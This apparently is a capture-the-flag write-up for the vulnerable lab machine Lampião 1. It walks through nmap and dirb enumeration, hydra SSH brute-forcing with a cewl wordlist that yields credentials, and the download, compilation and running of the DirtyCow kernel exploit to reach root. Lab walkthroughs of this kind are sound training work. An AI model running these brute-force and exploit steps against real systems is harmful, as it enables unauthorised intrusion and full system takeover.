Lampião

Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root! This was a great machine as I learnt about a new linux vulnerability DirtyCow. Based on my experience, getting the first foothold was easy but escalating the user rights was slightly more tricky as it involved testing out a few different CVEs. Some research helped me identify which one to use, at the end of the day it’s experience with privsec which helps the most.

URL: Lampião

Difficulty: Easy

Author: Tiago Tavares

Enumeration

Set up the Machine with a host-only adapter and run an nmap command to discover all the hosts on the local host-only network. My interface eth1 is Host-Only on my main OS (Kali Linux).

nmap -sn 192.168.54.1/24

net

We can identify the machine with the IP 192.168.54.6, so we will scan it for open ports with nmap to a file named “nmap” with the following command:

nmap -sS -p- -A -o "nmap" 192.168.54.6

nmap

We see port 80 open so let’s visit this port with our browser. This is the webpage:

web

There doesn’t seem to be much, I visit port 1898 on my web browser:

http://192.168.54.6:1898/

1898

According to the nmap results, there were quite a few entries in the robots.txt. I’ll run a dirb scan just to find all the paths:

dirb http://192.168.54.6:1898/

dirb

First, I’ll visit the robots.txt:

http://192.168.54.6:1898/robots.txt

robots

The above is a snippet of just the disallowed entries. I first visited the changelog.txt path:

http://192.168.54.6:1898/CHANGELOG.txt

changelog

We can identify a service and version number:

Drupal 7.54

This is worth noting in case we need to find any vulnerabilities.

I also wanted to note the potential username “tiago” I found on one of the posts:

http://192.168.54.6:1898/?q=node/1

username?

The URL was worth investigating as well. I tried manually navigating to another post using the URL. I changed ?q=node/1 to ?q=node/2:

http://192.168.54.6:1898/?q=node/2

node 2

Another possible user named “Eder” as highlighted in the above screenshot. There is also node 3 but no new information.

I couldn’t find much more information on the web pages of this machine so I decided to go straight to brute forcing. There are 2 possible entry points: SSH (identified from our port scan) and the web site login (no admin login page found).

Let’s try brute forcing the SSH login - create a wordlist of the 2 usernames found:

Eder
tiago

user list

I will use the following hydra command:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.54.6 -t 4 ssh

-L specified a username wordlist, -P specifies the password wordlist and -t 4 threads.

The hydra command took too long so I wanted to make my wordlist, especially as this seems to be a Portuguese web server. The post @ ?q=node/1 had a lot of words so I want to use a tool called Cewl to crawl this web page and create a wordlist which I can use for my brute-force. Here is the following command:

cewl http://192.168.54.6:1898/?q=node/1 --write passwords.txt

This is the first few lines of the wordlist we have just created:

head

Let’s execute the hydra command again but with this new password list:

hydra -L users.txt -P passwords.txt 192.168.54.6 -t 4 ssh

hydra result

We have some credentials returned = tiago:Virgulino

Let’s use this to connect via SSH:

ssh [email protected]
Virgulino

ssh login

We have successfully logged in as uid tiago. Nice :)

Privilege Escalation

For this machine, I will be using a script to identify any vulnerabilities on the system. This is a good script I recommend for Linux machines:

mzet Github

Let’s download this onto our local machine first:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

wget script

Create a HTTP server so we can transfer this onto our victims machine:

python -m SimpleHTTPServer 8080

http

Now let’s transfer the files into the victims /tmp directory on our ssh shell:

cd /tmp
wget http://192.168.54.4:8080/linux-exploit-suggester.sh

Make this an executable and execute it.

chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

exe

The output will be a list of possible exploits, I will be using this one in particular:

dirtycow2

This is called dirtycow because of the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.

Dirty Cow Exploit

Here is a youtube video about this exploit.

It says the download link however it is no longer stored here. Use this website for the script:

Source Code

As we have done before, download this script onto your local machine and create a simple HTTP server:

wget https://www.exploit-db.com/raw/40847 40847.cpp
python -m SimpleHTTPServer 8080

http

Now transfer this file onto the /tmp directory of the victims PC:

wget http://192.168.54.4:8080/40847
mv 40847 40847.cpp

ready

Now that we have our script 40847.cpp ready, let’s compile the file:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

compiled

We now need to execute “dcow”:

./dcow

dcow

We have been told the root password has been changed to: dirtyCowFun. Let’s change to root:

su root
dirtyCowFun

We are now logged in as root!

root

id
cd /root
cat flag.txt
Written on May 28, 2020